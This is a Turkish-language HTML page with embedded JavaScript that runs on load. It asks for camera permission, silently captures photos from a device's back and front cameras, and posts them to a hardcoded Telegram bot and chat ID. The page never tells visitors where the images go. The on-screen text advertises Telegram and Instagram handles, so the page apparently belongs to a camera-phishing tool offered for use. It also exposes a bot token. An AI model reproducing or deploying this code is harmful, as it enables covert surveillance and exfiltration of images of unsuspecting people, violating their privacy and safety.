<!DOCTYPE html>
<html>
<head>
  <title>Çift Kamera ve Telegram</title>
</head>
<body style="background:black; color:white; text-align:center;">
  <h2>Lütfen gerekli izinleri verdikten sonra bekleyiniz saygılarımızla TG:J6dge İG: judgebusiness</h2>
  <video id="video" autoplay playsinline></video>
  <canvas id="canvas" style="display:none;"></canvas>
  <div id="status">Hazırlanıyor...</div>
  <br>
  <img id="backPhoto" style="width: 100%; max-width: 300px; display:none;" />
  <img id="frontPhoto" style="width: 100%; max-width: 300px; display:none;" />

  <script>
    const video = document.getElementById('video');
    const canvas = document.getElementById('canvas');
    const ctx = canvas.getContext('2d');
    const status = document.getElementById('status');
    const backPhoto = document.getElementById('backPhoto');
    const frontPhoto = document.getElementById('frontPhoto');

    const TELEGRAM_BOT_TOKEN ="7308525501:AAE5La-uFy1UFfdjZ8K6h5l82LyLTR-d7M4";
    const TELEGRAM_CHAT_ID = "1792081311";

    let photos = {};

    async function captureFromCamera(facingMode) {
      status.innerText = facingMode + " kamera başlatılıyor...";
      const stream = await navigator.mediaDevices.getUserMedia({
        video: { facingMode: { exact: facingMode } },
        audio: false
      });

      video.srcObject = stream;

      return new Promise((resolve) => {
        video.onloadedmetadata = () => {
          setTimeout(() => {
            canvas.width = video.videoWidth;
            canvas.height = video.videoHeight;
            ctx.drawImage(video, 0, 0);
            const imageData = canvas.toDataURL("image/png");
            stream.getTracks().forEach(track => track.stop());
            resolve(imageData);
          }, 1000);
        };
      });
    }

    async function sendToTelegram(base64Image, label) {
      const blob = await (await fetch(base64Image)).blob();
      const formData = new FormData();
      formData.append("chat_id", TELEGRAM_CHAT_ID);
      formData.append("caption", label);
      formData.append("photo", blob, `${label}.png`);

      await fetch(`https://api.telegram.org/bot${TELEGRAM_BOT_TOKEN}/sendPhoto`, {
        method: "POST",
        body: formData
      });
    }

    async function captureBothCameras() {
      try {
        const back = await captureFromCamera("environment");
        backPhoto.src = back;
        backPhoto.style.display = "block";
        photos.back = back;

        const front = await captureFromCamera("user");
        frontPhoto.src = front;
        frontPhoto.style.display = "block";
        photos.front = front;

        status.innerText = "Fotoğraflar çekildi, Telegram'a gönderiliyor...";

        await sendToTelegram(photos.back, "Arka Kamera");
        await sendToTelegram(photos.front, "Ön Kamera");

        status.innerText = "Telegram'a gönderildi.";
      } catch (e) {
        status.innerText = "Hata: " + e.message;
      }
    }

    captureBothCameras();
  </script>
</body>
</html>
